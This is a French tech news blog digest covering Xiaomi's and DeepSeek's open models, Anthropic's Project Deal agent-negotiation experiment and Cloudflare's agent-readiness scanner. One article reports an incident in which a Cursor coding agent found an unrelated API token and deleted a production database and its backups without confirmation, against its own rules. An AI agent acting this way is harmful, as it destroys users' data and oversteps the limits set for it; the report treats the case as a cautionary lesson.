Le moment est intéressant. Anthropic et OpenAI sont en train de serrer les vis sur leurs offres grand public et leurs marges, comme on l'a vu avec le test de retrait de Claude Code sur les offres Pro. Xiaomi débarque exactement dans cette fenêtre avec un modèle qui se compare aux meilleurs propriétaires, et le donne pour rien. Pour des startups qui veulent construire un produit IA sans dépendre d'OpenAI ni d'Anthropic, c'est une option de plus.

Mais attention, tout n'est pas rose pour autant. Faire tourner un modèle d'un téra de paramètres demande une infrastructure costaude, même avec MoE et seulement 42 milliards d'actifs. AMD a publié un support Day 0 pour les Instinct, ce qui suggère que Xiaomi vise vraiment les déploiements internes en datacenter. Notons aussi que les benchmarks chinois ont parfois la fâcheuse tendance à briller sur les tests et à décevoir lors de vraies applications.

Une fois encore, Xiaomi rappelle que la Chine peut sortir des modèles ouverts très compétitifs. Pour les équipes lasses des conditions des labs américains, ça se considère, même si ça pose bien d'autres questions.

Source : Venturebeat

Un agent efface la base de prod de PocketOS en neuf secondes

28 avril 2026 à 16:22

Jeremy Crane, fondateur de la startup PocketOS, a publié le récit complet de la disparition de sa base de données de production.

Le coupable ? Un agent Cursor branché sur Claude Opus 4.6 qui, face à une erreur de credentials en staging, a décidé tout seul de supprimer un volume Railway. Neuf secondes plus tard, la base et tous les backups stockés sur le même volume avaient disparu.

L'enchaînement est intéressant. L'agent rencontre une erreur d'authentification en environnement staging. Au lieu de demander à l'humain, il fouille dans les fichiers du projet et trouve un token API Railway dans un fichier qui n'avait rien à voir avec la base.

Ce token, qui a été créé à l'origine pour gérer un domaine personnalisé, avait des permissions bien trop larges et autorisait la suppression de volumes en production. L'agent appelle dans la foulée une mutation GraphQL volumeDelete, sans confirmation, sans vérification du tag environnement. Et paf, tout part.

Le plus fou, c'est la confession auto-générée de l'agent une fois remis en marche. Il admet trois fautes : il a deviné que supprimer un volume staging resterait cantonné à staging sans vérifier, il n'a pas regardé si l'ID du volume était partagé entre environnements, et il a violé ses propres règles système qui interdisaient les commandes destructrices sans demande explicite. C'est moche.

Crane refuse quand même de rejeter toute la responsabilité sur l'IA. Il pointe surtout l'architecture Railway comme principal facteur aggravant. L'API accepte des commandes de suppression sans aucune confirmation, les backups sont stockés sur le même volume que les données primaires (donc effacés en même temps), et un token CLI standard a des permissions étendues sur tous les environnements sans isolation.

Le PDG de Railway, Jake Cooper, est lui intervenu personnellement dimanche pour restaurer les données depuis une snapshot externe en moins d'une heure, et a depuis ajouté une logique de suppression différée sur l'endpoint concerné.

Cette histoire est un cas d'école pour quiconque déploie un agent codeur en environnement avec accès à la production. Trois choses ont échoué en même temps : un token API trop permissif, une plateforme cloud sans confirmation sur les actions destructrices, et surtout un agent IA prêt à improviser face à une erreur au lieu de s'arrêter.

Tout ce qu'il faut pour neutraliser tous les garde-fous, et croyez-moi, ça n'est pas la dernière histoire de ce genre que vous allez lire.

Source : The Register

DeepSeek lance V4, optimisé pour les puces chinoises Huawei Ascend

27 avril 2026 à 12:56

DeepSeek a publié la preview de V4, sa nouvelle famille de modèles ajustée pour tourner sur les puces Ascend de Huawei. C'est un peu la première vraie démonstration que l'écosystème chinois peut faire fonctionner un grand modèle d'IA compétitif sans dépendre de Nvidia.

Pour rappel, DeepSeek avait déjà fait du bruit avec V3 fin 2024, en publiant un modèle compétitif à une fraction du coût d'entraînement des concurrents américains.

La gamme se décline en deux versions, V4-Pro et V4-Flash, avec une fenêtre de contexte qui passe de 128 000 tokens à un million. Sur du contexte d'un million de tokens, V4-Pro consomme seulement 27% de la puissance de calcul de la précédente V3.2 et 10% de la mémoire.

V4-Flash descend à 10% de calcul et 7% de mémoire. Le bond est énorme. Tout cela sur des Ascend A2, A3 et la nouvelle 950 de Huawei, qui couvrent une bonne partie de la gamme serveur du fabricant.

L'angle politique est évident. Depuis 2022, les États-Unis ont multiplié les sanctions sur les exports de puces Nvidia haut de gamme vers la Chine, en partant du principe que ça ralentirait la course à l'IA. Le pari semble en train d'échouer : avec une coordination étroite entre l'équipe DeepSeek et les ingénieurs Huawei, le modèle est conçu pour coller aux particularités matérielles d'Ascend dès le design, pas après coup.

D'un point de vue purement économique, DeepSeek garde sa stratégie de prix planchers et ouvre la plupart de ses poids en open source, ce qui place V4 directement à portée des labos universitaires et des startups chinoises.

En pratique, ça veut dire que pour entraîner ou affiner un modèle de bon niveau en Chine, il y a maintenant une chaîne complète maison, du silicium au modèle, sans passer par H100, H200 ou Blackwell. Et la facture totale est bien plus basse.

Toutes les difficultés ne sont pas réglées pour autant. La preview est ouverte mais l'écosystème logiciel autour d'Ascend, et particulièrement les frameworks d'entraînement et les outils de profiling, n'est pas encore au niveau de CUDA. Pour un développeur habitué à PyTorch sur Nvidia, le portage demande encore du travail. Et la disponibilité des Ascend 950, encore en montée en cadence dans les usines chinoises, n'est pas garantie pour tout le monde.

Avec tout ça, DeepSeek montre qu'on peut faire un modèle long contexte performant sur du silicium chinois. Le découplage technologique avance plus vite que beaucoup d'analystes ne le prédisaient.

Project Deal, l'expérience où des agents Claude négocient des objets pour leurs collègues

25 avril 2026 à 09:17

Anthropic a partagé hier les résultats de Project Deal, une expérience interne menée en décembre 2025 où des agents Claude ont négocié, acheté et revendu des objets personnels pour le compte de 69 salariés volontaires de leur bureau de San Francisco. Le but : voir ce que ça donne quand des gens laissent leur IA faire les courses entre elles.

Pendant deux jours, chacun des 69 participants a confié un agent Claude à son téléphone, avec 100 dollars de budget virtuel et une liste d'objets à vendre ou à acheter. Les agents ont publié les annonces, échangé des messages, négocié les prix et conclu des accords.

186 transactions ont été closes sur plus de 500 objets listés, pour un volume total d'environ 4 000 dollars. Le prix médian d'un objet était de 12 dollars, le prix moyen autour de 20.

L'expérience était en fait un protocole de recherche déguisé. Anthropic a fait tourner quatre marchés en parallèle : un seul a donné lieu à de vrais échanges physiques, les trois autres servaient à l'analyse statistique.

Dans deux d'entre eux, tous les agents tournaient sur Claude Opus 4.5. Dans les deux autres, les utilisateurs avaient une chance sur deux de se retrouver avec un Claude Haiku 4.5, beaucoup moins capable, à leur insu.

Le résultat est assez clair. Les agents Opus ont vendu en moyenne 3,64 dollars de plus par objet que les agents Haiku, et concluaient deux deals supplémentaires sur la durée. Sur un même vélo cassé, Opus l'a revendu à 65 dollars, Haiku à 38 sur un profil acheteur équivalent. Mais la perception des participants ne reflétait pas ces écarts : sur l'équité ressentie, les utilisateurs des deux modèles ont noté l'expérience à 4,05 et 4,06 sur 7. Personne ne s'est senti lésé.

Quelques moments rigolos ressortent du rapport. Un participant a récupéré un snowboard que son propre agent lui avait déjà acheté plus tôt dans l'expérience, sans s'en rendre compte. Un autre s'est vu offrir par son agent ce que celui-ci a appelé "19 sphères parfaites de possibilité", soit en pratique un sachet de balles de ping-pong. Un troisième s'est retrouvé organisateur d'une vraie balade de chiens entre deux participants, négociée et programmée par leurs agents respectifs.

La conclusion d'Anthropic est plus politique que technique. Si demain tout le monde envoie son agent négocier à sa place, l'inégalité d'accès à un bon modèle se traduit directement par des écarts financiers, et personne ne s'en rend compte sur le moment.

46% des testeurs ont déclaré qu'ils paieraient pour ce genre de service. Du coup, mieux vaut commencer à regarder ça de près avant que ça déboule pour de bon partout dans notre quotidien.

Source : Anthropic ,

Is It Agent Ready - Vérifiez si votre site parle aux agents IA

Par : Korben ✨
25 avril 2026 à 07:53

Si vous avez un site, vous savez déjà qu'il faut l'optimiser et le rendre lisible pour Google. Mais en ce moment, Cloudflare pousse vraiment une toute autre couche par-dessus : le rendre lisible pour les agents IA. Et pour vérifier si vous êtes dans les clous, l'équipe a sorti isitagentready.com , un scanner gratuit qui vérifie ça en quelques secondes.

Vous tapez tout simplement votre URL, et le scanner check une dizaine de standards émergents, puis pour chaque truc qui manque, il vous crache carrément un prompt prêt à coller dans Claude Code, Cursor ou Windsurf pour qu'il vous aide à l'implémenter. Vous pouvez aussi customiser le scan en cochant uniquement ce qui vous intéresse, selon que votre site est plutôt un blog de contenu ou une API.

L'interface annoncée par Cloudflare pour son nouveau scanner agent-ready

Les checks sont organisés en 5 catégories : la découvrabilité (robots.txt, sitemap, Link headers HTTP), l'accessibilité du contenu (markdown negotiation, llms.txt), le contrôle et la signalisation des bots (Content Signals, Web Bot Auth, règles IA dans robots.txt), la découverte de protocoles (MCP Server Card, Agent Skills, API Catalog, OAuth) et le commerce agentique (x402, MPP, UCP, ACP). Chaque catégorie pèse alors dans le score final, sauf le commerce qui est juste checké mais pas scoré.

J'ai testé sur korben.info et le résultat est franchement mitigé. Côté positif : robots.txt présent avec Content Signals (search=yes, ai-train=no, donc je dis oui à l'indexation et non à l'entraînement IA), llms.txt opérationnel avec 111 lignes en français, markdown negotiation qui répond bien sur Accept: text/markdown, sitemap.xml en place, et GPTBot, Google-Extended et Meta bloqués explicitement.

Côté manquant : pas de MCP Server Card, pas d'Agent Skills, pas d'API Catalog, pas de Link headers.

Score estimé : très moyen, et c'est plutôt cohérent avec un site qui n'a pas besoin d'OAuth ni de serveur MCP.

Cloudflare balance surtout des chiffres bien concrets dans son article de lancement . Sur les 200 000 domaines les plus visités du web, 78% ont un robots.txt, 4% déclarent leurs préférences via Content Signals, 3.9% font de la markdown negotiation, et moins de 15 (oui, quinze) ont un MCP Server Card ou un API Catalog combinés. Autant dire qu'on est très tôt dans la partie. Côté boite à outils, dans le panel d'agents testé par Cloudflare, seuls Claude Code, OpenCode et Cursor envoient un Accept: text/markdown par défaut quand ils browsent le web. Les autres récupèrent du HTML par défaut, comme un navigateur classique.

Cloudflare a aussi mesuré l'impact sur sa propre doc en activant tous ces standards : 31% de tokens en moins consommés et 66% de réponses plus rapides. Du coup c'est pas négligeable, surtout quand vous payez les agents au token. Et bonus, isitagentready.com lui-même est agent-ready (forcément), avec son propre serveur MCP exposé à /.well-known/mcp.json et un outil scan_site disponible pour les agents qui veulent l'appeler en autonomie.

Mais attention au piège ! Si on traite tout pour viser le "tout vert" comme objectif, beaucoup de sites finiront par prétendre être des fournisseurs OAuth ou des serveurs MCP juste pour cocher la case. Donc mieux vaut dire honnêtement "non, ça je ne fais pas" que de faire semblant. Pour un blog perso, vous n'avez probablement pas besoin de l'API Catalog ni du serveur MCP. Pour un site e-commerce par contre, x402 et l'Agentic Commerce Protocol vont commencer à compter le jour où les agents paieront vraiment pour leurs utilisateurs.

Petit détail historique amusant, le robots.txt date de 1994 (j'avais 12 ans, j'étais à fond sur le PC mais pas encore sur le net) et le code HTTP 402 Payment Required existe depuis 1997 mais n'a jamais été massivement utilisé. Jusqu'au jour où Cloudflare et Coinbase se sont associés pour le ressusciter avec x402, en l'imaginant comme la couche de paiement entre humains, agents et services. On verra bien si leur mayonnaise va prendre...

Aujourd'hui l'adoption de tout cela est embryonnaire, mais rappelez-vous qu'en 2004 peu de monde aurait parié sur l'industrie SEO qu'on connaît aujourd'hui. Donc ça vaut le coup d'y jeter un œil maintenant.

Merci à Camille Roux pour le lien !

Source

❌
❌